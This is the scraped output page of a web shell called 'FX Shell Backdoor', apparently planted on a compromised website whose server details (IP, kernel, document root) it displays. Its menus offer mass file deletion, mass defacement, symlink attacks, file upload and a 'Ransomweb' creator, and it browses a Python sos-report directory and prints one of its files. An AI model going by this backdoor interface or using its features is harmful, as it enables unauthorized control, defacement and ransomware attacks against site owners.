FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
sos
/
policies
/
distros
/
Upload
Buat File
Buat Folder
Buat Ransomweb
# Copyright (C) Eric Desrochers <edesrochers@microsoft.com> # This file is part of the sos project: https://github.com/sosreport/sos # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions of # version 2 of the GNU General Public License. # # See the LICENSE file in the source distribution for further information. from sos.policies.distros.redhat import RedHatPolicy, OS_RELEASE import os class AzurePolicy(RedHatPolicy): distro = "Azure Linux" vendor = "Microsoft" vendor_urls = [ ('Distribution Website', 'https://github.com/microsoft/CBL-Mariner') ] def __init__(self, sysroot=None, init=None, probe_runtime=True, remote_exec=None): super(AzurePolicy, self).__init__(sysroot=sysroot, init=init, probe_runtime=probe_runtime, remote_exec=remote_exec) @classmethod def check(cls, remote=''): if remote: return cls.distro in remote if not os.path.exists(OS_RELEASE): return False with open(OS_RELEASE, 'r') as f: for line in f: if line.startswith('NAME'): if 'Common Base Linux Mariner' in line: return True return False # vim: set et ts=4 sw=4 :
__pycache__
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
amazon.py
Choose...
Edit
Rename
Delete
Now
anolis.py
Choose...
Edit
Rename
Delete
Now
azure.py
Choose...
Edit
Rename
Delete
Now
circle.py
Choose...
Edit
Rename
Delete
Now
cos.py
Choose...
Edit
Rename
Delete
Now
debian.py
Choose...
Edit
Rename
Delete
Now
opencloudos.py
Choose...
Edit
Rename
Delete
Now
openeuler.py
Choose...
Edit
Rename
Delete
Now
redhat.py
Choose...
Edit
Rename
Delete
Now
rocky.py
Choose...
Edit
Rename
Delete
Now
suse.py
Choose...
Edit
Rename
Delete
Now
ubuntu.py
Choose...
Edit
Rename
Delete
Now
uniontechserver.py
Choose...
Edit
Rename
Delete
Now